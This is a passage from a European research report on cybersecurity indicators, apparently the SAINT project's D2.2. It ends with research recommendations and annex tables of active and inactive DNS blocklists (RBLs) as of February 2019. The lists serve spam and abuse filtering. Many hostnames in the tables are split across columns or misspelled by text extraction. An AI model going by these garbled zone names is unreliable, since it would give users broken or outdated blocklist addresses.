executed according to the remit of this deliverable, and the SAINT project as a whole, but, due to the fast-paced nature of cybersecurity, it is considered to be a live document and without finite end. In consideration of this factor, there are several recommendations that the authors propose as follows: 1) This innovative taxonomy, presented as a live document, is worthy of further in-depth research and dedicated resources beyond the remit, and lifetime, of the SAINT project. 2) ‘Metrics for managing cybersecurity’ has value as an empirical research theme beyond the lifetime of the SAINT project. An avenue for this type of research could be an EU foundation in the style of “The Drucker Institute’168. 3) In line with 2) above, areas for exploration could include the determining of core principles as the

166 Europeans’ attitudes towards cyber security – 06 2017 - https://ec.europa.eu/home- affairs/news/europeans%E2%80%99-attitudes-towards-cyber-security_en 167 Three-quarters of cybercrime cases not reported - 09 2017 - https://www.cbs.nl/en-gb/news/2017/39/three- quarters-of-cybercrime-cases-not-reported 168 https://www.drucker.institute/ Copyright SAINT Consortium. All rights reserved. 105 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

foundation for measurement and performance methodologies from which relevant statistics and rankings could be proposed. 4) The Finnish model for cybersecurity should be proposed as an example of the value to all stakeholders of both measurement and management. The above themes will be proposed and presented as possible avenues for dissemination and exploration of SAINT results.

15 Annex A - Current List of all Open Source RBLs (Blacklists / Blocklists) - Alive – Feb 19

List of all Open Source RBLs blacklists / Blocklists

alive (328)

1 0spam DNSBL 0spam.fusionzero.com ipv4 - -

2 0spam DNSWL 0spamtrust.fusionzero.com ipv4 - -

3 0spam KillList 0spam- ipv4 - - killlist.fusionzero.com

4 0spam url-DBL 0spamurl.fusionzero.com - - domain

5 abuse.ch ZeuS Tracker domains uribl.zeustracker.abuse.ch - - domain

6 abuse.ch ZeuS Tracker IP ipbl.zeustracker.abuse.ch ipv4 - -

7 Abuse.net contacts.abuse.net - - domain

8 abuse.ro IP RBL rbl.abuse.ro ipv4 - -

9 abuse.ro URI RBL uribl.abuse.ro - - domain

10 abusix.org Abuse Contact DB abuse-contacts.abusix.org ipv4 - -

11 anonmails.de DNSBL spam.dnsbl.anonmails.de ipv4 - -

12 AntiCaptcha.NET IPv4 dnsbl.anticaptcha.net ipv4 - -

13 AntiCaptcha.NET IPv6 dnsbl6.anticaptcha.net - ipv6 -

14 ANTISPAM-UFRJ orvedb orvedb.aupads.org ipv4 - -

15 ANTISPAM-UFRJ rsbl rsbl.aupads.org ipv4 - -

16 Ascams.com Block block.ascams.com ipv4 - -

17 Ascams.com Superblock superblock.ascams.com ipv4 - -

18 ASPEWS Listings aspews.ext.sorbs.net ipv4 - -

19 Backscatterer.org ips.backscatterer.org ipv4 - -

20 Barracuda Reputation Block List b.barracudacentral.org ipv4 - -

21 Barracuda Reputation Block List bb.barracudacentral.org ipv4 - - (for SpamAssassin)

22 BBFH Level 1 list.bbfh.org ipv4 - -

23 BBFH Level 1 (@SORBS) l1.bbfh.ext.sorbs.net ipv4 - -

24 BBFH Level 2 (@SORBS) l2.bbfh.ext.sorbs.net ipv4 - -

25 BBFH Level 3 (@SORBS) l3.bbfh.ext.sorbs.net ipv4 - -

26 BBFH Level 4 (@SORBS) l4.bbfh.ext.sorbs.net ipv4 - -

27 BIT.nl all ascc IPv4 address all.ascc.dnsbl.bit.nl ipv4 - - space list

28 BIT.nl all ascc IPv6 address all.v6.ascc.dnsbl.bit.nl - ipv6 - space list

29 BIT.nl all IPv4 address space list all.dnsbl.bit.nl ipv4 - -

30 BIT.nl all IPv6 address space list ipv6.all.dnsbl.bit.nl - ipv6 -

31 BIT.nl own IPv4 and IPv6 bitonly.dnsbl.bit.nl ipv4 ipv6 - address space list

32 blacklist.netcore.co.in blacklist.netcore.co.in - - domain

33 BlakJak.net RBL rbl.blakjak.net ipv4 - -

34 BlockedServers NetScan RBL netscan.rbl.blockedservers. ipv4 - - com

35 BlockedServers RBL rbl.blockedservers.com ipv4 - -

36 BlockedServers Spam RBL spam.rbl.blockedservers.co ipv4 - - m

37 Blog Spam Blacklist list.blogspambl.com ipv4 - -

38 Blog Spam Blocklist (empty.us) bsb.empty.us ipv4 - domain

39 Blog Spam Blocklist bsb.spamlookup.net ipv4 - domain (spamlookup.net)

40 Bondedsender query.bondedsender.org ipv4 - -

41 Bondedsender plus plus.bondedsender.org ipv4 - -

42 borderware.com DNSBL1 dnsbl1.dnsbl.borderware.c ipv4 - - om

43 borderware.com DNSBL2 dnsbl2.dnsbl.borderware.c ipv4 - - om

44 borderware.com DNSBL3 dnsbl3.dnsbl.borderware.c ipv4 - - om

45 borderware.com DUL dul.dnsbl.borderware.com ipv4 - -

46 C&CZ's own black list blacklist.sci.kun.nl ipv4 - -

47 C&CZ's own white list whitelist.sci.kun.nl ipv4 - -

48 cantv.net dul dul.blackhole.cantv.net ipv4 - domain

49 cantv.net hog hog.blackhole.cantv.net ipv4 - domain

50 cantv.net rhsbl rhsbl.blackhole.cantv.net ipv4 - domain

51 cantv.net rot rot.blackhole.cantv.net ipv4 - domain

52 cantv.net spam spam.blackhole.cantv.net ipv4 - domain

53 CASA CBL cbl.anti-spam.org.cn ipv4 - -

54 CASA CBL+ cblplus.anti-spam.org.cn ipv4 - -

55 CASA CBL- cblless.anti-spam.org.cn ipv4 - -

56 CASA CDL cdl.anti-spam.org.cn ipv4 - -

57 CASA CML cml.anti-spam.org.cn ipv4 - -

58 CBL cbl.abuseat.org ipv4 - -

59 choon.net IPv4 DNSBL rbl.choon.net ipv4 - -

60 choon.net IPv4 DNSWL rwl.choon.net ipv4 - -

61 choon.net IPv6 DNSBL ipv6.rbl.choon.net - ipv6 -

62 choon.net IPv6 DNSWL ipv6.rwl.choon.net - ipv6 -

63 countries.nerd.dk DNSBL (zz) zz.countries.nerd.dk ipv4 - -

64 Cyberlogic DNSBL dnsbl.cyberlogic.net ipv4 - -

65 Cymru Bogon List bogons.cymru.com ipv4 - -

66 Cymru Fullbogon IPv4 List v4.fullbogons.cymru.com ipv4 - -

67 Cymru Fullbogon IPv6 List v6.fullbogons.cymru.com - ipv6 -

68 Cymru origin IPv4 asn list origin.asn.cymru.com ipv4 - -

69 Cymru origin IPv6 asn list origin6.asn.cymru.com - ipv6 -

70 Cymru peer asn list peer.asn.cymru.com ipv4 - -

71 dan.me.uk (all tor nodes) tor.dan.me.uk ipv4 - -

72 dan.me.uk (only tor exit nodes) torexit.dan.me.uk ipv4 - -

73 DNS-bl ex zone ex.dnsbl.org - - domain

74 DNS-bl in zone in.dnsbl.org - - domain

75 DNS-SERVICIOS RBL rbl.dns-servicios.com ipv4 - -

76 dnsbl.abyan.es dnsbl.abyan.es ipv4 - domain

77 dnsbl.beetjevreemd.nl dnsbl.beetjevreemd.nl ipv4 ipv6 -

78 dnsbl.calivent.com.pe dnsbl.calivent.com.pe ipv4 - -

79 dnsbl.mcu.edu.tw dnsbl.mcu.edu.tw ipv4 - -

80 dnsbl.net.ua dnsbl.net.ua ipv4 - -

81 dnsbl.othello.ch dnsbl.othello.ch - - domain

82 dnsbl.rv-soft.info dnsbl.rv-soft.info ipv4 - -

83 dnsblchile.org dnsblchile.org ipv4 - -

84 DNSRBL - DNS Real-time dnsrbl.org ipv4 - - Blackhole List

85 DNSWL.org list.dnswl.org ipv4 ipv6 -

86 DRBL caravan.ru (vote node) vote.drbl.caravan.ru ipv4 - -

87 DRBL caravan.ru (work node) work.drbl.caravan.ru ipv4 - -

88 DRBL dsbl.ru (vote node) vote.drbldf.dsbl.ru ipv4 - -

89 DRBL dsbl.ru (work node) work.drbldf.dsbl.ru ipv4 - -

90 DRBL gremlin.ru (vote node) vote.drbl.gremlin.ru ipv4 - -

91 DRBL gremlin.ru (work node) work.drbl.gremlin.ru ipv4 - -

92 DrMX bl.drmx.org ipv4 - -

93 DroneBL dnsbl.dronebl.org ipv4 ipv6 -

94 EFnet RBL rbl.efnet.org ipv4 - -

95 EFnet RBL mirror rbl.efnetrbl.org ipv4 - -

96 EFnet TOR tor.efnet.org ipv4 - -

97 emailbasura.org bl.emailbasura.org ipv4 - -

98 Fasthosts RBL rbl.fasthosts.co.uk ipv4 - -

99 fmb.la bl bl.fmb.la ipv4 - domain

100 fmb.la communicado communicado.fmb.la - - domain

101 fmb.la nsbl nsbl.fmb.la - - domain

102 fmb.la sa sa.fmb.la - - domain

103 fmb.la short short.fmb.la - - domain

104 fnrbl.fast.net fnrbl.fast.net ipv4 - -

105 forbidden.icm.edu.pl forbidden.icm.edu.pl ipv4 - -

106 Frontbridge’s 88.blocklist.zap 88.blocklist.zap ipv4 - -

107 Habeas Infringer List hil.habeas.com ipv4 - -

108 Habeas SafeList accredit.habeas.com ipv4 - -

109 Habeas SafeList (for sa-accredit.habeas.com ipv4 - - SpamAssassin)

110 Habeas User List hul.habeas.com ipv4 - -

111 Habeas User List (including Non- sohul.habeas.com ipv4 - - Verified-Optin)

112 Hostkarma hostkarma.junkemailfilter.c ipv4 - domain om

113 Hostkarma no blacklist nobl.junkemailfilter.com ipv4 - domain

114 IBM DNS Blacklist dnsbl.cobion.com ipv4 - -

115 ImproWare IP based spamlist spamrbl.imp.ch ipv4 - -

116 ImproWare IP based wormlist wormrbl.imp.ch ipv4 - -

117 inps.de-DNSBL dnsbl.inps.de ipv4 - -

118 inps.de-DNSWL dnswl.inps.de ipv4 - -

119 InterServer BL rbl.interserver.net ipv4 - -

120 invaluement DNSBL ivmSIP (hidden) ipv4 -

121 invaluement DNSBL ivmSIP/24 (hidden) ipv4 - -

122 invaluement DNSBL ivmURI (hidden) - - domain

123 IPrange.net RBL rbl.iprange.net ipv4 - -

124 ISIPP Accreditation Database iadb.isipp.com ipv4 - -

125 ISIPP Accreditation Database iadb2.isipp.com ipv4 - - (IADB2)

126 ISIPP Accreditation Database iddb.isipp.com - - domain (IDDB)

127 ISIPP Accreditation Database wadb.isipp.com ipv4 - - (WADB)

128 ISPA (Internet Service Provider whitelist.rbl.ispa.at ipv4 - - Austria) Whitelist

129 JIPPG's RBL Project (mail-abuse mail- ipv4 - - Listings) abuse.blacklist.jippg.org

130 JustSpam.org dnsbl.justspam.org ipv4 - -

131 Kempt.net DNS Black List dnsbl.kempt.net ipv4 - -

132 KISA-RBL spamlist.or.kr ipv4 - -

133 KONSTANT DNSBL bl.konstant.no ipv4 - -

134 kundenserver.de admin.bl admin.bl.kundenserver.de ipv4 - -

135 kundenserver.de relays relays.bl.kundenserver.de ipv4 - -

136 kundenserver.de schizo-bl schizo-bl.kundenserver.de ipv4 - -

137 kundenserver.de spamblock spamblock.kundenserver.d ipv4 - - e

138 kundenserver.de worms-bl worms-bl.kundenserver.de ipv4 - -

139 Leadmon.Net's SpamGuard spamguard.leadmon.net ipv4 - - Listings (LNSG)

140 lugh.ch DNSBL rbl.lugh.ch ipv4 - -

141 Madavi:BL dnsbl.madavi.de ipv4 - -

142 mailrelay.att.net blacklist blacklist.mailrelay.att.net ipv4 - -

143 Mailspike Blacklist bl.mailspike.net ipv4 - -

144 Mailspike Reputation rep.mailspike.net ipv4 - -

145 Mailspike Whitelist wl.mailspike.net ipv4 - -

146 Mailspike Zero-hour Data z.mailspike.net ipv4 - -

147 MAV BL bl.mav.com.br ipv4 - -

148 McAfee RBL cidr.bl.mcafee.com ipv4 - -

149 MegaRBL.net rbl.megarbl.net ipv4 - -

150 Microsoft Forefront DNSBL dnsbl.forefront.microsoft.c ipv4 - - om

151 MIPSpace bl.mipspace.com ipv4 - -

152 MSRBL combined combined.rbl.msrbl.net ipv4 - -

153 MSRBL images images.rbl.msrbl.net ipv4 - -

154 MSRBL phishing phishing.rbl.msrbl.net ipv4 - -

155 MSRBL spam spam.rbl.msrbl.net ipv4 - -

156 MSRBL virus virus.rbl.msrbl.net ipv4 - -

157 MSRBL web web.rbl.msrbl.net ipv4 - -

158 MXRate RBL (hidden) ipv4 - -

159 nether.net (relays) relays.nether.net ipv4 - -

160 nether.net (trusted) trusted.nether.net ipv4 - -

161 nether.net (unsure) unsure.nether.net ipv4 - -

162 NiX Spam DNSBL ix.dnsbl.manitu.net ipv4 - -

163 no-more-funn no-more-funn.moensted.dk ipv4 - -

164 NoSolicitado.org (hidden) ipv4 - -

165 nsZones.com DNSWL wl.nszones.com ipv4 - -

166 nsZones.com Dyn dyn.nszones.com ipv4 - -

167 nsZones.com SBL sbl.nszones.com ipv4 - -

168 nsZones.com SBL+Dyn bl.nszones.com ipv4 - -

169 nsZones.com SURBL ubl.nszones.com - - domain

170 Open Resolver Check dnsbl.openresolvers.org ipv4 - -

171 ops.asp.att.net blacklist mail blacklist.mail.ops.asp.att.ne ipv4 - - t

172 ops.asp.att.net blacklist sequoia blacklist.sequoia.ops.asp.at ipv4 - - t.net

173 Pedantic.org spam spam.pedantic.org ipv4 - -

174 pofon.foobar.hu IP Blacklist pofon.foobar.hu ipv4 ipv6 -

175 pofon.foobar.hu ISP mail relay ispmx.pofon.foobar.hu ipv4 ipv6 - whitelist

176 pofon.foobar.hu URI Blacklist uribl.pofon.foobar.hu - - domain

177 PowerWeb DNSBL (hidden) ipv4 - -

178 Project Honey Pot (http:BL) (hidden) ipv4 - -

179 Proofpoint Dynamic Reputation safe.dnsbl.prs.proofpoint.c ipv4 - - om

180 Protected Sky RBL bad.psky.me ipv4 - -

181 PSBL (Passive Spam Block List) psbl.surriel.com ipv4 - -

182 PSBL whitelist whitelist.surriel.com ipv4 - -

183 RBL.JP all all.rbl.jp ipv4 - -

184 RBL.JP dyndns domainains dyndns.rbl.jp - - domain

185 RBL.JP short short.rbl.jp ipv4 - -

186 RBL.JP url url.rbl.jp - - domain

187 RBL.JP virus virus.rbl.jp ipv4 - -

188 rbl.rbldns.ru rbl.rbldns.ru ipv4 - -

189 rbl.schulte.org rbl.schulte.org ipv4 - -

190 rbl.talkactive.net rbl.talkactive.net ipv4 - -

191 rbl.zenon.net rbl.zenon.net ipv4 - -

192 realtimeBLACKLIST.COM rbl.realtimeblacklist.com ipv4 - -

193 Redhawk.org access.redhawk.org ipv4 - -

194 RedIRIS ListaBlanca ESWL eswlrev.dnsbl.rediris.es ipv4 ipv6 -

195 RedIRIS ListaBlanca MTAWL mtawlrev.dnsbl.rediris.es ipv4 ipv6 -

196 RFC-Clueless (RFC²) abuse RBL abuse.rfc-clueless.org - - domain

197 RFC-Clueless (RFC²) BogusMX bogusmx.rfc-clueless.org - - domain RBL

198 RFC-Clueless (RFC²) DSN RBL dsn.rfc-clueless.org - - domain

199 RFC-Clueless (RFC²) Elitist RBL elitist.rfc-clueless.org - - domain

200 RFC-Clueless (RFC²) Metalist fulldomain.rfc-clueless.org - - domain

RBL

201 RFC-Clueless (RFC²) postmaster postmaster.rfc-clueless.org - - domain RBL

202 RFC-Clueless (RFC²) whois RBL whois.rfc-clueless.org - - domain

203 Rizon RBL/DNSBL dnsbl.rizon.net ipv4 - -

204 rjek.com mailsl DNSBL mailsl.dnsbl.rjek.com - - domain

205 rjek.com urlsl DNSBL urlsl.dnsbl.rjek.com - - domain

206 rothen.com DynIp dynip.rothen.com ipv4 - -

207 Route Views Project asn asn.routeviews.org ipv4 - -

208 Route Views Project aspath aspath.routeviews.org ipv4 - -

209 Rymsho's DNSBL dnsbl.rymsho.ru ipv4 - -

210 Rymsho's RHSBL rhsbl.rymsho.ru - - domain

211 s5h.net RBL all.s5h.net ipv4 ipv6 -

212 SARBL public.sarbl.org - - domain

213 scientificspam.net domainain rhsbl.scientificspam.net - - domain list

214 scientificspam.net IP list bl.scientificspam.net ipv4 - -

215 Scrollout F1 Reputation reputation- - - domain domainain domainain.rbl.scrolloutf1.c om

216 Scrollout F1 Reputation IP reputation- ipv4 - - ip.rbl.scrolloutf1.com

217 Scrollout F1 Reputation NS reputation- - - domain ns.rbl.scrolloutf1.com

218 sectoor TOR blacklist tor.dnsbl.sectoor.de ipv4 - -

219 sectoor TOR blacklist (exit exitnodes.tor.dnsbl.sectoor ipv4 - - nodes) .de

220 SenderBase® query.senderbase.org ipv4 - -

221 SenderBase® (for sa.senderbase.org ipv4 - - SpamAssassin)

222 SenderBase® (Reputation List) rf.senderbase.org ipv4 - -

223 SenderScore Blacklist bl.score.senderscore.com ipv4 - -

224 SenderScore Reputationlist score.senderscore.com ipv4 - -

225 SINGULARis Spam/scam singular.ttk.pte.hu ipv4 - - blocklist

226 Solid Clues Blacklist blackholes.scconsult.com ipv4 - -

227 SORBS Aggregate zone dnsbl.sorbs.net ipv4 - -

228 SORBS Aggregate zone problems.dnsbl.sorbs.net ipv4 - - (problems)

229 SORBS Aggregate zone (proxies) proxies.dnsbl.sorbs.net ipv4 - -

230 SORBS Aggregate zone (relays) relays.dnsbl.sorbs.net ipv4 - -

231 SORBS Aggregate zone (safe) safe.dnsbl.sorbs.net ipv4 - -

232 SORBS domainain names nomail.rhsbl.sorbs.net - - domain indicating no email sender

233 SORBS domainain names badconf.rhsbl.sorbs.net - - domain pointing to bad addresses

234 SORBS Dynamic IP Addresses dul.dnsbl.sorbs.net ipv4 - -

235 SORBS hijacked networks zombie.dnsbl.sorbs.net ipv4 - -

236 SORBS Hosts demanding never block.dnsbl.sorbs.net ipv4 - - be tested by SORBS

237 SORBS netblocks of spam escalations.dnsbl.sorbs.net ipv4 - - supporting service providers

238 SORBS Open HTTP Proxies http.dnsbl.sorbs.net ipv4 - -

239 SORBS Open other Proxies misc.dnsbl.sorbs.net ipv4 - -

240 SORBS Open SMTP relays smtp.dnsbl.sorbs.net ipv4 - -

241 SORBS Open SOCKS Proxies socks.dnsbl.sorbs.net ipv4 - -

242 SORBS RHS Aggregate zone rhsbl.sorbs.net - - domain

243 SORBS Spamhost (any time) spam.dnsbl.sorbs.net ipv4 - -

244 SORBS Spamhost (last 28 days) recent.spam.dnsbl.sorbs.ne ipv4 - - t

245 SORBS Spamhost (last 48 hours) new.spam.dnsbl.sorbs.net ipv4 - -

246 SORBS Spamhost (last year) old.spam.dnsbl.sorbs.net ipv4 - -

247 SORBS Vulnerable formmailers web.dnsbl.sorbs.net ipv4 - -

248 South Korean Network Blocking korea.services.net ipv4 - - List

249 Spam Eating Monkey GeoBL geobl.spameatingmonkey.n ipv4 - - (deny all) et

250 Spam Eating Monkey SEM-ASN- origin.asn.spameatingmonk ipv4 - - ORIGIN ey.net

251 Spam Eating Monkey SEM- backscatter.spameatingmo ipv4 - - BACKSCATTER nkey.net

252 Spam Eating Monkey SEM- badnets.spameatingmonke ipv4 - - BADNETS y.net

253 Spam Eating Monkey SEM- bl.spameatingmonkey.net ipv4 - - BLACK

254 Spam Eating Monkey SEM- fresh.spameatingmonkey.n - - domain FRESH et

255 Spam Eating Monkey SEM- fresh10.spameatingmonkey - - domain FRESH10 .net

256 Spam Eating Monkey SEM- fresh15.spameatingmonkey - - domain FRESH15 .net

257 Spam Eating Monkey SEM- bl.ipv6.spameatingmonkey. - ipv6 - IPV6BL net

258 Spam Eating Monkey SEM- netbl.spameatingmonkey.n ipv4 - - NETBLACK et

259 Spam Eating Monkey SEM-URI uribl.spameatingmonkey.n - - domain et

260 Spam Eating Monkey SEM- urired.spameatingmonkey. - - domain URIRED net

261 Spam Grouper Net block list netblockbl.spamgrouper.to ipv4 - -

262 Spam-RBL.fr all.spam-rbl.fr ipv4 - -

263 SpamCannibal bl.spamcannibal.org ipv4 - -

264 SpamCop Blocking List bl.spamcop.net ipv4 - -

265 Spamhaus DBL domainain Block dbl.spamhaus.org - - domain List

266 Spamhaus DWL domainain _vouch.dwl.spamhaus.org - - domain Whitelist

267 Spamhaus PBL Policy Block List pbl.spamhaus.org ipv4 - -

268 Spamhaus SBL Spamhaus Block sbl.spamhaus.org ipv4 - - List

269 Spamhaus SBL-XBL Combined sbl-xbl.spamhaus.org ipv4 - - Block List

270 Spamhaus SWL IP Whitelist swl.spamhaus.org ipv4 ipv6 -

271 Spamhaus XBL Exploits Block xbl.spamhaus.org ipv4 - - List

272 Spamhaus ZEN Combined Block zen.spamhaus.org ipv4 - - List

273 SpamLab FEB feb.spamlab.com ipv4 - -

274 SpamLab RBL rbl.spamlab.com ipv4 - -

275 SpamRATS! all all.spamrats.com ipv4 - -

276 SpamRATS! Dyna dyna.spamrats.com ipv4 - -

277 SpamRATS! NoPtr noptr.spamrats.com ipv4 - -

278 SpamRATS! Spam spam.spamrats.com ipv4 - -

279 spamsources.fabel.dk spamsources.fabel.dk ipv4 - -

280 SpamStinks.com DNSBL bl.spamstinks.com ipv4 - -

281 SPFBL.net RBL dnsbl.spfbl.net ipv4 ipv6 domain

282 SPFBL.net Whitelist dnswl.spfbl.net ipv4 ipv6 domain

283 StopSpam.org dul dul.pacifier.net ipv4 - -

284 Suomispam Blacklist bl.suomispam.net ipv4 ipv6 -

285 Suomispam domainain Blacklist dbl.suomispam.net - - domain

286 Suomispam Graylist gl.suomispam.net ipv4 ipv6 -

287 SURBL multi (Combined SURBL multi.surbl.org ipv4 - domain list)

288 SurGATE Reputation Network srn.surgate.net ipv4 - - (SRN)

289 Swinog DNSRBL dnsrbl.swinog.ch ipv4 - -

290 Swinog URIBL uribl.swinog.ch - - domain

291 TDC's RBL rbl.tdk.net ipv4 - -

292 TechnoVision SpamTrap st.technovision.dk ipv4 - -

293 The Day Old Bread List (aka dob.sibl.support- - - domain DOB) intelligence.net

294 Tiopan Consulting domainain dbl.tiopan.com - - domain Blacklist

295 Tiopan Consulting IP Blacklist bl.tiopan.com ipv4 - -

296 TornevallNET DNSBL dnsbl.tornevall.org ipv4 - -

297 Trend Micro DUL r.mail-abuse.com ipv4 - -

298 Trend Micro QIL q.mail-abuse.com ipv4 - -

299 TRIUMF.ca DNSBL rbl2.triumf.ca ipv4 - -

300 TRIUMF.ca DNSWL wbl.triumf.ca ipv4 - -

301 truncate.gbudb.net truncate.gbudb.net ipv4 - -

302 tuxad dunk.dnsbl dunk.dnsbl.tuxad.de ipv4 - -

303 tuxad hartkore.dnsbl hartkore.dnsbl.tuxad.de ipv4 - -

304 UCEPROTECT Level 0 dnsbl-0.uceprotect.net ipv4 - -

305 UCEPROTECT Level 1 dnsbl-1.uceprotect.net ipv4 - -

306 UCEPROTECT Level 2 dnsbl-2.uceprotect.net ipv4 - -

307 UCEPROTECT Level 3 dnsbl-3.uceprotect.net ipv4 - -

308 Unsubscribe Blacklist UBL ubl.unsubscore.com ipv4 - -

309 URIBL black black.uribl.com - - domain

310 URIBL grey grey.uribl.com - - domain

311 URIBL multi multi.uribl.com - - domain

312 URIBL red red.uribl.com - - domain

313 URIBL white white.uribl.com - - domain

314 V4BL-FREE/DDNSBL-FREE free.v4bl.org ipv4 - -

315 V4BL/DDNSBL ip.v4bl.org ipv4 - -

316 WebIron LLC All RBL all.rbl.webiron.net ipv4 - -

317 WebIron LLC BABL RBL babl.rbl.webiron.net ipv4 - -

318 WebIron LLC CABL RBL cabl.rbl.webiron.net ipv4 - -

319 WebIron LLC Crawler RBL crawler.rbl.webiron.net ipv4 - -

320 WebIron LLC STABL RBL stabl.rbl.webiron.net ipv4 - -

321 Whitelisted.org ips.whitelisted.org ipv4 - -

322 Woody's SMTP Blacklist IPv4 blacklist.woody.ch ipv4 - -

323 Woody's SMTP Blacklist IPv6 ipv6.blacklist.woody.ch - ipv6 -

324 Woody's SMTP Blacklist URIBL uri.blacklist.woody.ch - - domain

325 WPBL - Weighted Private Block db.wpbl.info ipv4 - - List

326 www.blocklist.de bl.blocklist.de ipv4 - -

327 ZapBL DNSRBL dnsbl.zapbl.net ipv4 - -

328 ZapBL RHSBL rhsbl.zapbl.net - - domain

16 Annex B - List of all RBLs (Open Source Blacklists / Blocklists) – Currently Inactive – Feb 2019

List of all currently inactive RBLs (Blacklists / Blocklists)

Currently Inactive (488)

1 3y.spam.mrs.kithr 3y.spam.mrs.kithrup.com ipv4 - - up.com

2 510 Software blackholes.five-ten-sg.com ipv4 - - Group Blackholes

3 abuse.ch combined.abuse.ch ipv4 - - combined zone

4 abuse.ch dnsbl dnsbl.abuse.ch ipv4 - -

5 abuse.ch FastFlux drone.abuse.ch ipv4 - - Tracker

6 abuse.ch spam spam.abuse.ch ipv4 - - blacklist

7 abuse.ch Web httpbl.abuse.ch ipv4 - - abuse Tracker

8 AHBL ahbl.dnsbl.net.au ipv4 - - (@dnsbl.net.au)

9 AHBL DNSbl dnsbl.ahbl.org ipv4 - -

10 AHBL exemptions exemptions.ahbl.org ipv4 - -

11 AHBL IPAL ipal.ahbl.org ipv4 - -

12 AHBL IRCbl ircbl.ahbl.org ipv4 - -

13 AHBL RHSbl rhsbl.ahbl.org - - dom

14 AHBL TORbl tor.ahbl.org ipv4 - -

15 All Geek DNSBL dnsbl.allgeek.net ipv4 - -

16 all.spamblock.unit. all.spamblock.unit.liu.se ipv4 - - liu.se

17 ALPHANET blackholes.alphanet.ch ipv4 - - blackholes

18 AnonWhois.org list.anonwhois.net - - dom

19 ANTISPAM-UFRJ duinv.aupads.org ipv4 - - duinv

20 Antispam.or.id dnsbl.antispam.or.id ipv4 - -

21 Antispam.or.id orid.dnsbl.net.au ipv4 - - (@dnsbl.net.au)

22 Antispam.or.id orrh.dnsbl.net.au - - dom RHS (@dnsbl.net.au)

23 APEWS Level 1 l1.apews.org - - dom

24 APEWS Level 1 l1.apews.rhsbl.sorbs.net - - dom (@SORBS)

25 APEWS Level 1 l1-apews.tqmcube.com - - dom (@TQMCube)

26 APEWS Level 1 l1.apews.rhsbl.uceprotect.net - - dom (@UCEPROTECT)

27 APEWS Level 2 l2.apews.org ipv4 - -

28 APEWS Level 2 l2.apews.dnsbl.sorbs.net ipv4 - - (@SORBS)

29 APEWS Level 2 l2-apews.tqmcube.com ipv4 - -

(@TQMCube)

30 APEWS Level 2 l2.apews.dnsbl.uceprotect.net ipv4 - - (@UCEPROTECT)

31 arix.com fresh.dict.rbl.arix.com ipv4 - - Dictionary Spammers (fresh)

32 arix.com stale.dict.rbl.arix.com ipv4 - - Dictionary Spammers (stale)

33 arix.com Slippers fresh.sa_slip.rbl.arix.com ipv4 - - (fresh)

34 arix.com Slippers stale.sa_slip.arix.com ipv4 - - (stale)

35 ARSPAM arspam.buanzo.org ipv4 - - Argentinian Spammers DNSBL

36 ASPEWS Listings aspews.dnsbl.sorbs.net ipv4 - - (old zone)

37 ASPnet dnsbl.aspnet.hu ipv4 - dom DNSBL/URIBL

38 assholes.madscien assholes.madscience.nl ipv4 - - ce.nl

39 ATLBL ABL access.atlbl.net ipv4 - -

40 ATLBL HBL hbl.atlbl.net - - dom

41 ATLBL RBL rbl.atlbl.net ipv4 - -

42 BBM bbm.2ch.net ipv4 - -

43 BBQ niku.2ch.net ipv4 - -

44 BBX bbx.2ch.net ipv4 - -

45 be.whitelist.skopo be.whitelist.skopos.be ipv4 - - s.be

46 bl.borderworlds.dk bl.borderworlds.dk ipv4 - -

47 bl.redhatgate.com bl.redhatgate.com ipv4 - -

48 bl.reynolds.net.au bl.reynolds.net.au ipv4 - -

49 bl.reynolds.net.au endn.bl.reynolds.net.au ipv4 - - (endn)

50 bl.reynolds.net.au pdl.bl.reynolds.net.au ipv4 - - (pdl)

51 bl.reynolds.net.au rdts.bl.reynolds.net.au ipv4 - - (rdts)

52 bl.reynolds.net.au wdl.bl.reynolds.net.au ipv4 - - (wdl)

53 bl.spam-trap.net bl.spam-trap.net ipv4 - -

54 BL.Spam.DeadBeef bl.deadbeef.com ipv4 - dom .Com

55 bl.spamthwart.co bl.spamthwart.com ipv4 - - m

56 bl.starloop.com bl.starloop.com ipv4 - -

57 bl.student.pw.edu. bl.student.pw.edu.pl ipv4 - - pl

58 bl.tolkien.dk bl.tolkien.dk ipv4 - -

59 blackholes.2mbit.c blackholes.2mbit.com ipv4 - - om

60 blackholes.brainer blackholes.brainerd.net ipv4 - - d.net

61 Blackholes.us countries.blackholes.us ipv4 - - countries

62 blacklist.fpsn.net blacklist.fpsn.net ipv4 - -

63 blacklist.informati blacklist.informationwave.net ipv4 - - onwave.net

64 BlarsBL block.blars.org ipv4 - -

65 blbl.org IP RBL bl.blbl.org ipv4 - -

66 blbl.org URI RBL uri-bl.blbl.org - - dom

67 Blitzed Open Proxy opm.blitzed.org ipv4 - - Monitor (OPM)

68 Blitzed Open Proxy http.opm.blitzed.org ipv4 - - Monitor (OPM- http)

69 Blitzed Open Proxy socks.opm.blitzed.org ipv4 - - Monitor (OPM- socks)

70 Blitzed Open Proxy wingate.opm.blitzed.org ipv4 - - Monitor (OPM- wingate)

71 block.me.uk block.me.uk ipv4 - -

72 blocked.asgardnet. blocked.asgardnet.org ipv4 - - org

73 BlueShore bl.blueshore.net ipv4 - - Network Block List

74 Bulgarian SPAM dnsbl.isoc.bg ipv4 - - prevention system

75 Bulgarian SPAM dnswl.isoc.bg ipv4 - - prevention system whitelist

76 Burnt-Tech DNSBL dnsbl.burnt-tech.com ipv4 - -

77 C&CZ's own black blacklist.sci.ru.nl ipv4 - - list (old)

78 C&CZ's own white whitelist.sci.ru.nl ipv4 - - list (old)

79 Cart00ney.org cart00ney.surriel.com ipv4 - dom DNSBL/RHSBL

80 catchspam.com catchspam.com ipv4 - -

81 cbn.net.id DNSBL dnsbl.cbn.net.id ipv4 - -

82 cbn.net.id RBL rbl.cbn.net.id ipv4 - -

83 chickenboner.biz fl.chickenboner.biz ipv4 - -

84 cluecentral.net satos.rbl.cluecentral.net ipv4 - - Satos

85 completewhois arin-legacy- ipv4 - - Bogons "legacy" classb.bogons.dnsiplists.completewhois ARIN Class-B blocks .com

86 completewhois arin-legacy- ipv4 - - Bogons "legacy" classc.bogons.dnsiplists.completewhois ARIN Class-C blocks .com

87 completewhois apnic- ipv4 - - Bogons APNIC main.bogons.dnsiplists.completewhois. main ip blocks com

88 completewhois iana- ipv4 - - Bogons IANA classa.bogons.dnsiplists.completewhois unallocated Class- .com A blocks

89 completewhois lacnic- ipv4 - - Bogons LACNIC ip main.bogons.dnsiplists.completewhois. blocks com

